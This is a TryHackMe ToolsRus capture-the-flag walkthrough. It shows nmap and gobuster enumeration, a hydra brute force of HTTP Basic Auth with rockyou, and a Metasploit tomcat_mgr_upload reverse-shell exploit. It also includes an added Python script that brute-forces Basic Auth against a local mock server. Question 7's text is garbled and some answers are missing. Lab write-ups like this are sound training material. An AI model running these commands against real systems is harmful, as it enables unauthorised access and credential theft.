Challenges: ToolsRus (TryHackMe)

Jebitok

Welcome to ToolsRus, a beginner-friendly TryHackMe room that introduces the enumeration and exploitation tools used in almost every penetration test. In this challenge we use Nmap, Gobuster, Hydra, Nikto and Metasploit to find hidden directories, recover credentials, and finally get a shell on the target.

The walkthrough follows a realistic chain: web directory discovery, brute-forcing HTTP Basic Auth credentials, and then reusing those credentials against an Apache Tomcat Manager instance exposed on a second port. Each stage depends on information gathered in the one before it, which is the habit the room is trying to build.

ToolsRus

Your challenge is to use the tools listed below to enumerate a server, gathering information along the way that will eventually lead to you taking over the machine.

This room will introduce you to the following tools:

  • Dirbuster

  • Hydra

  • Nmap

  • Nikto

  • Metasploit

If you are stuck at any point, each tool has a respective room or module linked above.

Answer the questions below

  1. What directory can you find, that begins with a "g"?

    Start with enumeration: a service scan with nmap, a directory scan with gobuster, and a look at the site itself.

    nmap -sV IP_Address

    gobuster dir -u http://IP_Address -w /usr/share/wordlists/dirb/common.txt

    The gobuster output lists the directory.

  2. Whose name can you find from this directory?

    Browse to that directory on the site (http://IP_Address/<directory>); the name is on the page.

  3. What directory has basic authentication?

    gobuster reports it with status 401 rather than 200: the server answers with a Basic Auth challenge instead of the page.

  4. What is bob's password to the protected part of the website?

    hydra -l bob -P /usr/share/wordlists/rockyou.txt IP_Address http-get /protected

    -l fixes the username, -P supplies the password list and http-get is hydra's module for HTTP Basic Auth, with /protected as the path that issued the 401. On Kali, rockyou ships compressed; if the file is missing, gunzip /usr/share/wordlists/rockyou.txt.gz first.
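    The gobuster and hydra steps above, as an added example that is not part of the original walkthrough or the room: a Python script that starts a constructed mock web server on loopback, enumerates directories from a small wordlist, treats a 401 as the marker for the Basic Auth directory, and then brute-forces bob's password against it, which is exactly what hydra's http-get module does. The mock server, its directory names, the two word lists and bob's password are constructed assumptions, not values from the room.

```python
"""Directory discovery and HTTP Basic Auth brute force against a local mock target.

Constructed stand-in for the gobuster / hydra steps: the mock server, its
directory names and bob's password are assumptions, not values from the room.
"""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed mock target: one open directory, one behind Basic Auth.
MOCK_DIRS = {"/images": None, "/protected": ("bob", "sunshine1")}


def basic_token(user, password):
    """The Authorization header value a browser (or hydra http-get) sends."""
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


class MockHandler(BaseHTTPRequestHandler):
    def log_message(self, *args):  # keep the server quiet
        pass

    def do_GET(self):
        path = self.path.rstrip("/") or "/"
        if path == "/":
            return self._reply(200, b"index")
        if path not in MOCK_DIRS:
            return self._reply(404, b"not found")
        creds = MOCK_DIRS[path]
        if creds is None or self.headers.get("Authorization") == basic_token(*creds):
            return self._reply(200, b"directory listing")
        # Wrong or missing credentials: challenge the client, like an htpasswd-protected dir.
        self.send_response(401)
        self.send_header("WWW-Authenticate", 'Basic realm="protected"')
        self.end_headers()

    def _reply(self, code, body):
        self.send_response(code)
        self.end_headers()
        self.wfile.write(body)


def start_mock_server():
    """Bind a random loopback port and serve in the background; returns (server, base_url)."""
    srv = HTTPServer(("127.0.0.1", 0), MockHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, f"http://127.0.0.1:{srv.server_address[1]}"


# Ignore any proxy from the environment: the target is loopback.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def status_of(url, auth=None):
    """HTTP status for a GET, optionally with Basic credentials (user, password)."""
    req = urllib.request.Request(url)
    if auth:
        req.add_header("Authorization", basic_token(*auth))
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.getcode()
    except urllib.error.HTTPError as err:
        return err.code


def enumerate_dirs(base_url, wordlist):
    """gobuster dir: request every word and keep anything that is not 404.

    A 401 is as interesting as a 200: it marks the directory that has Basic Auth.
    """
    found = {}
    for word in wordlist:
        code = status_of(f"{base_url}/{word}")
        if code != 404:
            found[f"/{word}"] = code
    return found


def brute_basic_auth(base_url, path, user, passwords):
    """hydra -l user -P wordlist http-get path: first password that turns 401 into 200."""
    for password in passwords:
        if status_of(base_url + path, (user, password)) == 200:
            return password
    return None


if __name__ == "__main__":
    server, base = start_mock_server()
    wordlist = ["admin", "images", "protected", "backup"]       # constructed common.txt
    passwords = ["123456", "password", "iloveyou", "sunshine1"]  # constructed rockyou.txt
    found = enumerate_dirs(base, wordlist)
    print("directories:", found)  # {'/images': 200, '/protected': 401}
    for path, code in found.items():
        if code == 401:
            print(path, "-> bob's password:", brute_basic_auth(base, path, "bob", passwords))
    server.shutdown()
```

    Basic Auth gives no signal other than the status code, so the brute-forcer stops at the first 200, which is also how hydra decides a guess succeeded; the only thing a real target adds is a lockout or rate limit, which is why the attempt is noisy in the server's access log.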

  5. What other port that serves a web service is open on the machine?

    nmap -sV -sC IP_Address

    -sV identifies the service and version on each open port and -sC runs the default NSE scripts, which pull extra details such as page titles from HTTP services.

  6. What is the name and version of the software running on the port from question 5?

    Both come from the same nmap -sV output.

  7. Use Nikto with the credentials you have found and scan the /manager/html directory on the port found above. How many docume0

    Navigated to /manager/html, then counted the ones with 0.

  8. What is the server version?

  9. What version of Apache-Coyote is this service using?

    Check the nmap results.

  10. Use Metasploit to exploit the service and get a shell on the system. What user did you get a shell as?

    The Tomcat Manager accepts the credentials recovered in question 4, and its WAR upload feature is what the Metasploit module abuses:

    msfconsole
    search tomcat mgr upload
    use exploit/multi/http/tomcat_mgr_upload
    show options
    set HttpUsername bob
    set HttpPassword <password from question 4>
    set RHOSTS IP_Address
    set RPORT <port from question 5>
    exploit

    The module uses a reverse payload by default, so if LHOST does not already point at the interface that reaches the target (the VPN interface on TryHackMe), set LHOST as well before running exploit. Once the session opens, getuid (or shell followed by whoami) answers the question.

    The first time it didn't work, so I had to try again.

  11. What flag is found in the root directory?

The ToolsRus box is a good hands-on exercise in foundational offensive techniques. Enumeration with Nmap, Gobuster and Nikto, credential recovery with Hydra, and exploitation with Metasploit carry the attacker from reconnaissance to post-exploitation.

We found hidden directories, brute-forced the credentials for a Basic Auth protected area, and reused them against an exposed Tomcat Manager interface to get a shell and read the root flag. The lesson is that every stage was unlocked by something found in an earlier one: the directory scan revealed the protected path, the hydra result unlocked the manager, and the manager gave up the shell.

Whether you are just starting out or preparing for a certification, ToolsRus is a reminder that beginner tools, used methodically and in the right order, uncover serious attack paths.


Written by Jebitok

Software Developer | Learning Cybersecurity | Open for roles. If you're in the early stages of your career in software development (student or still looking for an entry-level role) and in need of mentorship, you can reach out to me.